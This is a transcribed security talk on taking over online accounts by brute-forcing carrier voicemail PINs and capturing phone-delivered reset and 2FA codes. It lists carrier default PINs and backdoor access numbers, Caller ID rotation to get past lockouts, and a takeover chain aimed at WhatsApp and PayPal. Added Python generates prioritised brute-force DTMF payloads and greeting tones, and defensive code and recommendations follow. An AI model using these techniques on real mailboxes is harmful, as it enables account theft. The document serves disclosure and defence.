Compromising Online Accounts By Cracking Voicemail Systems

Transcription

Compromising online accounts by cracking voicemail systems
Martin Vigo, @martin_vigo, martinvigo.com

Martin Vigo, Product Security Lead. From Galicia, Spain. Research, scuba, gin tonics. @martin_vigo - martinvigo.com

History: back to ezines

“You can just enter all 2-digit combinations until you get the right one.” “A more sophisticated and fast way to do this is to take advantage of the fact that such machines typically do not read two numbers at a time, and discard them, but just look for the correct sequence.”
Source: Hacking Telephone Answering Machines, by Doctor Pizz and Cybersperm

“Quickly Enter the following 70809001 (this is the shortest string for entering every possible 2-digit combo.)”
Source: Hacking AT&T Answering Machines Quick and Dirty, by oleBuzzard

“Defaults For ASPEN Are: (E.G. Box is 888). Use Normal Hacking Techniques: i.e. 1111, 9999, 1234, 4321”
Source: A Tutorial of Aspen Voice Mailbox Systems, by Slycath

“There is also the old "change the message" secret to make it say something to the effect of this line accepts all toll charges so you can bill third party calls to that number”
Source: Hacking Answering Machines 1990, by Predat0r

Voicemail security in the '80s
- Default PINs
- Common PINs
- Bruteforceable PINs
- Efficient bruteforcing by sending multiple PINs at once
- The greeting message is an attack vector

Voicemail security today: checklist time!

Voicemail security today
Checklist: default PINs / common PINs / bruteforceable PINs / efficient bruteforcing by entering multiple PINs at once / the greeting message is an attack vector

Default PINs by carrier:
- AT&T: last 4 digits of the phone number
- Sprint: 111111
- T-Mobile: last 4 digits of the phone number
- Verizon:
- Vodafone: last 4 digits of the client number; last 4 digits of the PUK for CallYa; last 4 digits of the card number
- Telekom: last 7 digits of the phone number
- O2: 8705

Voicemail security today: common PINs
2012 research study by Data r3

Voicemail security today: bruteforceable PINs (allowed PIN lengths)
- AT&T: 4 to 7 digits
- Verizon: 4 to 6 digits
- Sprint: 4 to 10 digits
- T-Mobile: 4 to 10 digits
- Vodafone: 4 to 7 digits
- Telekom: 4 to 10 digits
- O2: 4 to 10 digits

Voicemail security today: efficient bruteforcing by entering multiple PINs at once
The system supports multiple PINs at a time: 0000#1111#2222# ... without waiting for the prompt or for error messages.
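The two payload layouts the deck describes, as an added example (this is not voicemailcracker.py or any code from the talk): the sliding-window answering machines quoted in the ezine section, which watch the digit stream for the correct sequence and so are covered by a de Bruijn sequence with no separators, and today's prompt-terminated mailboxes that accept "0000#1111#2222#" in one call, where the win comes from packing several prioritised candidates per call. The COMMON_PINS list is an illustrative stand-in for the ranked list from the PIN study the deck cites, and the "w" pause character assumes the calls are placed through Twilio's TwiML <Play digits="..."> as the tool does.

```python
from itertools import product

# Illustrative stand-in (assumption): replace with the ranked list from the PIN
# study the deck cites. The deck only says common PINs exist and are tried first.
COMMON_PINS = ["1234", "1111", "0000", "1212", "7777", "1004", "2000", "4444", "2222", "6969"]


def de_bruijn(k: int, n: int) -> str:
    """Cyclic de Bruijn sequence B(k, n) over the digits 0..k-1 (standard
    Lyndon-word construction). Read cyclically, every n-digit string occurs
    exactly once, so the sequence has k**n digits."""
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(str(d) for d in seq)


def covering_stream(n: int) -> str:
    """Digit stream for a machine that slides over the input looking for the
    right sequence: the cyclic sequence plus its first n-1 digits, so every
    n-digit PIN appears as a substring. That is 10**n + n - 1 digits instead
    of n * 10**n, with no separators at all."""
    s = de_bruijn(10, n)
    return s + s[:n - 1]


def candidate_pins(phone_number: str, length: int = 4, common=COMMON_PINS):
    """Yield PINs in the order worth trying: the carrier-style default (last
    `length` digits of the number, like the AT&T/T-Mobile defaults in the
    table), then common PINs, then the rest of the keyspace, no duplicates."""
    digits = "".join(ch for ch in phone_number if ch.isdigit())
    ordered = [digits[-length:]]
    ordered += [p for p in common if len(p) == length]
    ordered += ("".join(t) for t in product("0123456789", repeat=length))
    seen = set()
    for pin in ordered:
        if pin not in seen:
            seen.add(pin)
            yield pin


def call_payloads(pins, per_call: int, pause: str = "w"):
    """Pack candidates into per-call DTMF strings: each PIN followed by '#',
    with a short pause between them. 'w' is the 0.5 s wait character that
    TwiML's <Play digits="..."> accepts (assumption: calls go through Twilio)."""
    pins = list(pins)
    return [pause.join(p + "#" for p in pins[i:i + per_call])
            for i in range(0, len(pins), per_call)]


if __name__ == "__main__":
    print(covering_stream(2))          # 101 digits cover every 2-digit PIN
    calls = call_payloads(candidate_pins("+1 (415) 555-0134"), per_call=4)
    print(len(calls), "calls for the whole 4-digit keyspace; first call:", calls[0])
```

With four PINs per call the whole 4-digit keyspace is 2,500 calls, and because the default and common PINs lead the list, the calls that matter most are the first few; the per-call cost figures on the next slide follow directly from the call count.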

voicemailcracker.py: bruteforcing voicemails fast, cheap, easy, efficiently and undetected

voicemailcracker.py
- Fast: uses Twilio's APIs to make hundreds of calls at a time
- Easy: fully automated; configured with specific payloads for major carriers
- Cheap: the entire 4-digit keyspace for $40; a 50% chance of correctly guessing a 4-digit PIN for $5; check 1000 phone numbers for the default PIN for $13
- Efficient: optimizes bruteforcing; tries multiple PINs in the same call; uses existing research to prioritize default PINs, common PINs, patterns, etc.

Undetected

Straight to voicemail:
- Multiple calls at the same time (it's how the slydial service works in reality)
- Call when the phone is offline:
  - OSINT: airplane, movie theater, remote trip, Do Not Disturb
  - Query the HLR database: online services like realphonevalidation.com
  - Class 0 SMS: reports back whether it was displayed
Use backdoor voicemail numbers (no need to call the victim!):
- AT&T: 408-307-5049
- Verizon: 301-802-6245
- T-Mobile: 805-637-7243
- Sprint: 513-225-6245
- Vodafone: XXX-55-XXXXXXXX
- Telekom: XXX-13-XXXXXXXX
- O2: XXX-33-XXXXXXXX

voicemailcracker.py
- Fast: uses Twilio's APIs to make hundreds of calls at a time
- Easy: fully automated; configured with specific payloads for major carriers
- Cheap: the entire 4-digit keyspace for $40; a 50% chance of correctly guessing a 4-digit PIN for $5; check 1000 phone numbers for the default PIN for $13
- Efficient: optimizes bruteforcing; tries multiple PINs in the same call; uses existing research to prioritize default PINs, common PINs, patterns, etc.
- Undetected: supports backdoor voicemail numbers

Bruteforce protections

Different flavors in Germany:
- Vodafone: resets to a 6-digit PIN and sends it over SMS
- Telekom: blocks the Caller ID from accessing the mailbox, or even from leaving messages
- O2: connects directly to the customer help-line

Caller IDs are cheap. All three protections key on the Caller ID:
- Vodafone: resets to a 6-digit PIN and sends it over SMS
- Telekom: blocks the Caller ID from accessing the mailbox, or even from leaving messages
- O2: connects directly to the customer help-line
So an attacker who changes the Caller ID on every call never trips them.
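Why a Caller-ID-keyed lockout does not stop the tool, and what the carrier-side fix looks like, as an added example (toy code, not from the talk or the carriers): WeakMailboxAuth behaves like the mailboxes described above, consuming a whole "0000#1111#2222#" stream as several attempts in one call and counting failures per Caller ID; HardenedMailboxAuth takes one PIN per prompt, counts failures per mailbox, and refuses carrier-default and common PINs at set time. The MAX_ATTEMPTS value, the 6-digit minimum and the COMMON_PINS list are my assumptions.

```python
from dataclasses import dataclass, field

MAX_ATTEMPTS = 5                                   # assumption: lockout threshold
COMMON_PINS = {"1234", "1111", "0000", "123456", "111111", "000000"}  # illustrative


@dataclass
class WeakMailboxAuth:
    """Accepts a concatenated PIN stream and throttles by Caller ID only."""
    pins: dict                                       # mailbox number -> PIN
    failures: dict = field(default_factory=dict)     # keyed by caller id

    def login(self, mailbox, caller_id, digits):
        """Return the PIN that worked, or None. Every '#'-terminated chunk is
        tried in turn without waiting for a prompt; the only brake is the
        per-Caller-ID counter, which a new Caller ID resets to zero."""
        if self.failures.get(caller_id, 0) >= MAX_ATTEMPTS:
            return None
        for attempt in digits.split("#"):
            if not attempt:
                continue
            if attempt == self.pins.get(mailbox):
                return attempt
            self.failures[caller_id] = self.failures.get(caller_id, 0) + 1
        return None


@dataclass
class HardenedMailboxAuth:
    """One PIN per prompt, lockout keyed on the mailbox, no weak PINs."""
    pins: dict
    failures: dict = field(default_factory=dict)     # keyed by mailbox
    locked: set = field(default_factory=set)

    def set_pin(self, mailbox, pin):
        if len(pin) < 6 or not pin.isdigit():
            raise ValueError("PIN must be at least 6 digits")
        if mailbox.endswith(pin) or pin in COMMON_PINS or len(set(pin)) == 1:
            raise ValueError("PIN is a carrier default or a common PIN")
        self.pins[mailbox] = pin

    def login(self, mailbox, caller_id, digits):
        if mailbox in self.locked:
            return None
        attempt, _, _rest = digits.partition("#")    # anything after the first '#' is dropped
        if attempt == self.pins.get(mailbox):
            self.failures.pop(mailbox, None)
            return attempt
        self.failures[mailbox] = self.failures.get(mailbox, 0) + 1
        if self.failures[mailbox] >= MAX_ATTEMPTS:
            self.locked.add(mailbox)
        return None


def bruteforce(auth, mailbox, candidates, per_call, rotate_caller_id):
    """Drive either front-end the way the deck describes the tool: `per_call`
    PINs packed into one call, optionally a fresh Caller ID on every call.
    Returns (pin_or_None, calls_made)."""
    calls = 0
    for i in range(0, len(candidates), per_call):
        caller_id = f"+1555000{calls:04d}" if rotate_caller_id else "+15550000000"
        payload = "".join(p + "#" for p in candidates[i:i + per_call])
        calls += 1
        found = auth.login(mailbox, caller_id, payload)
        if found:
            return found, calls
    return None, calls


if __name__ == "__main__":
    keyspace = [f"{i:04d}" for i in range(10000)]
    weak = WeakMailboxAuth(pins={"4155550134": "0042"})
    print("weak, rotating Caller ID:", bruteforce(weak, "4155550134", keyspace, 10, True))
    hard = HardenedMailboxAuth(pins={"4155550134": "0042"})
    print("hardened, rotating Caller ID:", bruteforce(hard, "4155550134", keyspace, 10, True))
```

Against the weak front-end the rotating attacker recovers the PIN in a handful of calls; against the hardened one the mailbox locks after MAX_ATTEMPTS calls no matter how many Caller IDs are used, and each call only ever tests one PIN.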

voicemailcracker.py
- Fast: uses Twilio's APIs to make hundreds of calls at a time
- Easy: fully automated; configured with specific payloads for major carriers
- Cheap: the entire 4-digit keyspace for $40; a 50% chance of correctly guessing a 4-digit PIN for $5; check 1000 phone numbers for the default PIN for $13
- Efficient: optimizes bruteforcing; tries multiple PINs in the same call; uses existing research to prioritize default PINs, common PINs, patterns, etc.
- Undetected: supports backdoor voicemail numbers
- Bruteforce protection bypass: supports Caller ID randomization

Demo: bruteforcing voicemail systems with voicemailcracker.py

Impact: so what?

What happens if you don't pick up?

Voicemail takes the call and records it!

Attack vector
1. Bruteforce the voicemail system, ideally using backdoor numbers
2. Ensure calls go straight to voicemail (call flooding, OSINT, etc.)
3. Start the password reset process using the "Call me" feature
4. Listen to the recorded message containing the secret code
5. Profit!
voicemailcracker.py can do all this automatically

Demo: compromising WhatsApp

We done? Not yet

User-interaction-based protection:
- "Please press any key to hear the code"
- "Please press [A RANDOM KEY] to hear the code"
- "Please enter the code"

Can we beat this recommended protection?

Hint

Another hint
- Default PINs
- Common PINs
- Bruteforceable PINs
- Efficient bruteforcing by entering multiple PINs at once
- The greeting message is an attack vector

We can record DTMF tones as the greeting message!

Attack vector
1. Bruteforce the voicemail system, ideally using backdoor numbers
2. Update the greeting message according to the account to be hacked
3. Ensure calls go straight to voicemail (call flooding, OSINT, etc.)
4. Start the password reset process using the "Call me" feature
5. Listen to the recorded message containing the secret code
6. Profit!
voicemailcracker.py can do all this automatically

Demo: compromising PayPal

Vulnerable services (small subset)

Password reset

2FA

Verification

Physical security

Consent

Open source

voicemailautomator.py
- No bruteforcing
- Limited to 1 carrier
- Changes the greeting message with specially crafted payloads
- Retrieves messages containing the secret temporary codes
Git repo: github.com/martinvigo/voicemailautomator

Recommendations

Still, do I care?
if (carriersSetDefaultPins == TRUE)
  if (pinsBruteforceable == TRUE)
    if (updatingGreetingMessageAutomatable == TRUE)
      if (retrievingNewestMessageAutomatable == TRUE)
        if (speechToTextTranscription == TRUE)
          if (accountCompromiseIsAutomatable == TRUE)
            print "Yes, I should care"

Recommendations for online services
- Don't use automated calls for security purposes
- If that is not possible, detect the answering machine and fail
- Require user interaction before providing the secret, with the hope that carriers ban DTMF tones from greeting messages
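The last two recommendations (fail on an answering machine, require user interaction before speaking the secret), together with the "press a random key" variant from the protection slide, as an added service-side example. This is not code from the talk; the flow is modelled as a small state machine so it runs without a telephony provider, and the field names (MachineDetection, AnsweredBy, <Gather>, <Say>) follow Twilio's Calls API and TwiML, which is an assumption about the provider you would use. Note the limits the deck itself points out: a greeting that plays DTMF satisfies "press any key" outright, and a random key only forces a 1-in-9 guess per call, so the service must also cap delivery attempts per account.

```python
import secrets
from xml.sax.saxutils import escape

# AnsweredBy values the provider reports when machine detection is enabled
# (assumption: Twilio's names; any provider's answering-machine signal works alike).
MACHINE_ANSWERS = {"machine_start", "machine_end_beep", "machine_end_silence",
                   "machine_end_other", "fax"}


class CodeCall:
    """One outbound 'we will call you with your code' attempt."""

    def __init__(self, to_number: str, code: str):
        self.to = to_number
        self.code = code
        self.challenge = str(secrets.randbelow(9) + 1)   # one random key per call, 1-9
        self.state = "created"

    def call_params(self) -> dict:
        """Parameters for the provider's create-call request. With
        MachineDetection enabled the answer callback carries AnsweredBy."""
        return {"To": self.to, "MachineDetection": "Enable", "Url": "/voice/challenge"}

    def on_answered(self, answered_by: str) -> str:
        """TwiML for the answered call. A machine answer fails closed: hang up,
        so the code is never spoken into a mailbox recording."""
        if answered_by in MACHINE_ANSWERS:
            self.state = "refused_machine"
            return "<Response><Hangup/></Response>"
        self.state = "challenge"
        return ("<Response>"
                "<Gather numDigits=\"1\" action=\"/voice/code\" timeout=\"10\">"
                f"<Say>To hear your code, press {self.challenge}.</Say>"
                "</Gather><Hangup/></Response>")

    def on_gather(self, digits: str) -> str:
        """Callback with what the far end pressed. Exactly the expected key,
        and only while a challenge is outstanding, releases the code; a wrong
        key, several keys, or a second try after a refusal all hang up."""
        if self.state != "challenge":
            return "<Response><Hangup/></Response>"
        if digits != self.challenge:
            self.state = "refused_key"
            return "<Response><Say>That was not the expected key.</Say><Hangup/></Response>"
        self.state = "delivered"
        spoken = escape(" ".join(self.code))           # read digit by digit
        return f"<Response><Say>Your code is {spoken}.</Say><Hangup/></Response>"


if __name__ == "__main__":
    call = CodeCall("+14155550134", "482913")          # constructed sample values
    print(call.call_params())
    print(call.on_answered("human"))
    print(call.on_gather(call.challenge), call.state)
```

The webhook handlers for /voice/challenge and /voice/code would look up the CodeCall by call SID, pass AnsweredBy and Digits from the request into on_answered and on_gather, and return the TwiML string; the code itself never appears in the TwiML until the challenge has been met.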

Recommendations for carriers
- Ban DTMF tones from greeting messages
- Eliminate backdoor voicemail services, or at least give no access to the login prompt from them
- Voicemail disabled by default; it can only be activated from the actual phone or online
- No default PIN
- Don't allow common PINs
- Detect and prevent bruteforce attempts
- Don't process multiple PINs at once
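The greeting-message trick from the attack section and the first carrier recommendation above are two sides of the same signal, so one added example covers both (my code, not the talk's tools): dtmf_wave() synthesises the row/column tone pairs an attacker would record as the greeting so the mailbox "presses" keys when an automated call asks for input, and decode_dtmf() is the check a carrier could run on an uploaded greeting, a Goertzel filter per frame that rejects the upload if any key press is decodable. The 8 kHz sample rate, 40 ms frame and 0.5 purity threshold are my own choices.

```python
import math
import struct
import wave

SAMPLE_RATE = 8000                      # narrowband telephony
LOW = (697, 770, 852, 941)              # DTMF row tones
HIGH = (1209, 1336, 1477, 1633)         # DTMF column tones
KEYPAD = ("123A", "456B", "789C", "*0#D")
FREQS = {KEYPAD[r][c]: (LOW[r], HIGH[c]) for r in range(4) for c in range(4)}


def sine(freq, n, amp):
    return [amp * math.sin(2 * math.pi * freq * i / SAMPLE_RATE) for i in range(n)]


def dtmf_wave(keys, tone_ms=80, gap_ms=80, amp=0.4):
    """Samples (floats in -1..1) for `keys`: each key is its row+column tone
    pair followed by silence. This is what gets recorded as the greeting."""
    n_tone, n_gap = SAMPLE_RATE * tone_ms // 1000, SAMPLE_RATE * gap_ms // 1000
    out = []
    for k in keys:
        f1, f2 = FREQS[k]
        out += [a + b for a, b in zip(sine(f1, n_tone, amp / 2), sine(f2, n_tone, amp / 2))]
        out += [0.0] * n_gap
    return out


def write_wav(path, samples):
    """16-bit mono PCM, e.g. to upload as a greeting or feed to a detector."""
    with wave.open(path, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(SAMPLE_RATE)
        w.writeframes(b"".join(struct.pack("<h", int(max(-1.0, min(1.0, s)) * 32767))
                               for s in samples))


def goertzel_power(frame, freq):
    """|X(freq)|^2 of `frame` via the Goertzel recurrence (no FFT needed)."""
    coeff = 2 * math.cos(2 * math.pi * freq / SAMPLE_RATE)
    s1 = s2 = 0.0
    for x in frame:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def decode_dtmf(samples, frame_ms=40, purity=0.5):
    """Keys found in `samples`. A frame counts as DTMF only when its strongest
    row tone plus strongest column tone hold most of the frame's energy: for N
    samples of a sinusoid of amplitude A the Goertzel power is ~(A*N/2)^2 and
    the energy ~A^2*N/2, so (p_row + p_col) / (energy*N/2) is ~1 for a clean
    tone pair and near 0 for speech or music."""
    n = SAMPLE_RATE * frame_ms // 1000
    keys, last = [], None
    for start in range(0, len(samples) - n + 1, n):
        frame = samples[start:start + n]
        energy = sum(x * x for x in frame)
        if energy < 1e-6:                       # silence between presses
            last = None
            continue
        p_row = {f: goertzel_power(frame, f) for f in LOW}
        p_col = {f: goertzel_power(frame, f) for f in HIGH}
        row, col = max(p_row, key=p_row.get), max(p_col, key=p_col.get)
        if (p_row[row] + p_col[col]) / (energy * n / 2) < purity:
            last = None
            continue
        key = KEYPAD[LOW.index(row)][HIGH.index(col)]
        if key != last:                         # consecutive frames of one key = one press
            keys.append(key)
        last = key
    return keys


def greeting_contains_dtmf(samples):
    """Carrier-side upload check: reject the greeting if any key is decodable."""
    return bool(decode_dtmf(samples))


if __name__ == "__main__":
    greeting = dtmf_wave("1#")                  # "press 1" then "#", as a greeting payload
    write_wav("greeting.wav", greeting)
    print(decode_dtmf(greeting), greeting_contains_dtmf(greeting))
    print(greeting_contains_dtmf(sine(300, SAMPLE_RATE, 0.4)))   # a plain tone: False
```

A production filter would also decode after the carrier's own codec and resampling, since that is the audio the IVR on the other end actually hears, and would treat any decodable key, not just a full code, as grounds for rejecting the upload.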

Recommendations for you
- Disable voicemail, or use the longest possible random PIN
- Don't provide your phone number to online services unless it is required or it's the only way to get 2FA; use a virtual number to prevent OSINT and SIM swapping
- Use 2FA apps only

TL;DR
Automated phone calls are a common solution for password reset, 2FA, verification and other services. These can be compromised by leveraging old weaknesses and current technology to exploit the weakest link: voicemail systems.
The typical service: strong password policy; 2FA enforced; abuse/bruteforce prevention; an A in the OWASP Top 10 checklist; military-grade crypto end to end; lots of cyber. And also: password reset, 2FA, verification and consent over a phone call.

Danke schön! @martin_vigo - martinvigo.com
